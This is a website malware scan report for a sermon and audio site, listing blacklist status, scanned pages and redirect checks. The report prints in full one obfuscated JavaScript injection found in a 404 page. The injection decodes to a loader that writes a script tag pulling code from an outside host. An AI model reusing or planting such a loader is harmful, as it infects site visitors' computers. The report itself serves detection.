Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=welcometoodf.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://welcometoodf.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://welcometoodf.org/ | 200 OK Content-Length: 6513 Content-Type: text/html | clean |
http://welcometoodf.org/contact.htm | 200 OK Content-Length: 4615 Content-Type: text/html | clean |
http://welcometoodf.org/site.htm | 200 OK Content-Length: 6339 Content-Type: text/html | clean |
http://welcometoodf.org/index.htm | 200 OK Content-Length: 6513 Content-Type: text/html | clean |
http://welcometoodf.org/revelation/28dec2014.mp3 | 200 OK Content-Length: 300919 Content-Type: audio/mpeg | clean |
http://welcometoodf.org/test404page.js | 404 Not Found Content-Length: 3252 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
(function(){var k3V7='%';eval(unescape(('va.72.20.61.3d.22Sc.72iptEn.67ine.22.2cb.3d.22Ve.72sion()+.22.2c.6a.3d.22.22.2cu.3dnav.69ga.74or.2eus.65.72.41.67ent.3b.69f((u.2ein.64e.78O.66(.22Win.22).3e0).26.26.28.75.2eindexOf(.22N.54.206.22).3c0).26.26(d.6fcumen.74.2ecook.69.65.2einde.78.4ff(.22miek.3d1.22).3c.30).26.26(.74ypeof.28zr.76zts.29.21.3dtypeof(.22A.22.29).29.7bzrvzts.3d.22A.22.3beva.6c(.22if(wind.6fw.2e.22+a.2b.22.29j.3dj.2b.22+a+.22M.61j.6fr.22+b.2ba+.22M.69nor.22+b+a+.22B.75.69ld.22+b+.22j.3b.22.29.3bdocument.2ewr.69t.65(.22.3cscri.70t.20src.3d.2f.2fgumbla.72.2ecn.2f.72ss.2f.3fid.3d.22.2bj+.22.3e.3c.5c.2f.73.63.72ipt.3e.22).3b.7d').replace(/./g,k3V7)))})(); --> Antivirus reports:
http://welcometoodf.org/johns_epistles/standing_alone_part02.mp3 | 200 OK Content-Length: 302367 Content-Type: audio/mpeg | clean |
http://welcometoodf.org/About.htm | 200 OK Content-Length: 6506 Content-Type: text/html | clean |
http://welcometoodf.org/revelation.htm | 200 OK Content-Length: 6045 Content-Type: text/html | clean |
http://welcometoodf.org/topical.htm | 200 OK Content-Length: 18155 Content-Type: text/html | clean |
http://welcometoodf.org/kingdom.htm | 200 OK Content-Length: 11486 Content-Type: text/html | clean |
http://welcometoodf.org/johns_epistles.htm | 200 OK Content-Length: 7104 Content-Type: text/html | clean |
http://welcometoodf.org/love.htm | 200 OK Content-Length: 9540 Content-Type: text/html | clean |
http://welcometoodf.org/2corinthians.htm | 200 OK Content-Length: 18781 Content-Type: text/html | clean |
http://welcometoodf.org/perversions.htm | 200 OK Content-Length: 8353 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: welcometoodf.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:45:38 GMT
Accept-Ranges: bytes
ETag: "99c16c3-1971-50b643981db40"
Server: Apache/2.0.52 (Red Hat)
Content-Length: 6513
Content-Type: text/html
Last-Modified: Tue, 30 Dec 2014 00:39:33 GMT
X-Pad: avoid browser bug
...6513 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: welcometoodf.org
Referer: http://www.google.com/search?q=welcometoodf.org
Result:
The result is similar to the first query. There are no suspicious redirects found.